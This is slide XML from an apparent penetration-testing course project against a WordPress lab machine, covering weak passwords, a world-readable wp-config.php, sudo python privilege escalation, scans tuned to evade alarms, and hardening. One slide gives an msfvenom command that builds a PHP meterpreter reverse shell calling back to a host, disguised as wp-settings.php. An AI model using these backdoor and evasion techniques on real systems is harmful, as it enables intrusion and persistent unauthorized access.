              <a:t>Michael’s password is his name, all lowercase.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-114300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This password can easily be guessed, and would require very little time for a tool such as hydra or john to brute force.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="230" name="Google Shape;230;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1475" l="-10" r="10" t="1465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2350813" y="3301500"/>
            <a:ext cx="5918974" cy="188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Improper Permissions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236;p11"/>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37" name="Google Shape;237;p11"/>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114300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All users have access to the wp-config.php file which contains the database name and login information.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-114300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The availability of this information makes it possible for any user on this system to retrieve hashes of the passwords stored in the wp_user table.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="238" name="Google Shape;238;p11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751063" y="3686350"/>
            <a:ext cx="8689875" cy="115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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-14771" y="2520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Exploitation: More Improper Permissions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Google Shape;244;p12"/>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45" name="Google Shape;245;p12"/>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114300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steven has access to run python as the super user.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-114300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Running python programs as the superuser allows Steven’s account to do pretty much anything, including using the pty module to gain a root shell.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="246" name="Google Shape;246;p12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302663" y="2778450"/>
            <a:ext cx="9586675" cy="167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3"/>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252" name="Google Shape;252;p13"/>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253" name="Google Shape;253;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367259" y="2468134"/>
            <a:ext cx="11457450" cy="13728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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Avoiding Detection</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Google Shape;254;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-42123" y="17481422"/>
            <a:ext cx="28329749" cy="806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4"/>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Stealth Exploitation of nmap scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Google Shape;260;p14"/>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61" name="Google Shape;261;p14"/>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Monitoring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Nmap is sending packets to the whole range of of ip addresses that we specified so it will trigger both the http_errors and http_request_size alarms.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr b="1"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Running an nmap scan with only the -sS option will not trigger either alarm.</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This prevents us from enumerating the subdomains on the server but, because we can still see that port 80 is open for http traffic, we can visit the site to search for additional information without risking detection.</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5"/>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Stealth Exploitation of WP Enumeration</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Google Shape;267;p15"/>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68" name="Google Shape;268;p15"/>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Monitoring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Using wpscan will trigger alarms for http.request.bytes because it is using the layout of the wp site to gain information by sending many http requests.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr b="1"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Because we only need to find the users, we can just use the layout ourselves by adding /?author=# to the end of the URL, starting at 1 and going until we get a 404 error.</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There are only 2 users for this wp site so we will be well below any reasonable threshold for http requests or errors.</a:t>
            </a:r>
            <a:endParaRPr sz="2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
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317639" y="395654"/>
            <a:ext cx="11457450" cy="344543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9600"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Offensive Measures</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Defensive Measures</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Network Traffic Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Google Shape;134;p2"/>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35" name="Google Shape;135;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-14808" y="6555534"/>
            <a:ext cx="10626450" cy="302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6"/>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Stealth Exploitation of Weak Password Policy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Google Shape;274;p16"/>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75" name="Google Shape;275;p16"/>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Monitoring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SSH connections can be detected by monitoring for traffic on port 22.</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SSH should either be disabled or should require a stronger authentication method.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr b="1"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The passwords for root and michael are so predictable that they do not even require brute force techniques.</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Based on the current system configuration, no additional measures are required to quietly connect to these machines.</a:t>
            </a:r>
            <a:endParaRPr sz="2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7"/>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Stealth Exploitation of Improper Permissions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Google Shape;281;p17"/>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82" name="Google Shape;282;p17"/>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Monitoring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None of our alerts would trigger due to a user accessing the wp-config.php file.</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If the system administrator has made this file readable by all users, it is extremely unlikely that they are monitoring user access of this file.</a:t>
            </a:r>
            <a:endParaRPr sz="2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8"/>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Stealth Exploitation of More Improper Permissions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Google Shape;288;p18"/>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89" name="Google Shape;289;p18"/>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Monitoring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None of our alarms would be triggered by running python commands as the super user to escalate permissions.</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Steven probably required this permission to run a python script as the super user at some point, and the system administrator never removed this permission.  It is extremely unlikely that the system administrator is monitoring Steven’s execution of python scripts as super user.</a:t>
            </a:r>
            <a:endParaRPr sz="2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19"/>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295" name="Google Shape;295;p19"/>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296" name="Google Shape;296;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367259" y="2468134"/>
            <a:ext cx="11457450" cy="13728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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Maintaining Access</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-42123" y="17481422"/>
            <a:ext cx="28329749" cy="806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0"/>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Backdooring the Target</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Google Shape;303;p20"/>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04" name="Google Shape;304;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353275" y="1147700"/>
            <a:ext cx="11471401" cy="493335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b="1" lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backdoor Overview</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-114300" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To create persistence, we uploaded a reverse php shell file created with msfvenom.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-127000" lvl="1" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=1776 -f raw -o wp-settings.php</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It was placed on the target machine by using the scp command.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-114300" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Once the php file is on the web server, a connection can be made with metasploit.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="305" name="Google Shape;305;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2757600" y="3431088"/>
            <a:ext cx="6676801" cy="310125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="306" name="Google Shape;306;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4402600" y="4493800"/>
            <a:ext cx="3372750" cy="138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5"/>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312" name="Google Shape;312;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367232" y="2930500"/>
            <a:ext cx="11457450" cy="10353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Font typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hardening</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Google Shape;313;p25"/>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Hardening Against Weak Password Requirements on Target 1</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Google Shape;319;p26"/>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20" name="Google Shape;320;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353275" y="1147700"/>
            <a:ext cx="11471400" cy="493335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SzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Edit the /etc/security/pwquality.conf file and run chage to force users to set stronger passwords when next they login.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-139700" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This will make all user have passwords of significant complexity when next they login.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-139700" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RUN:</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
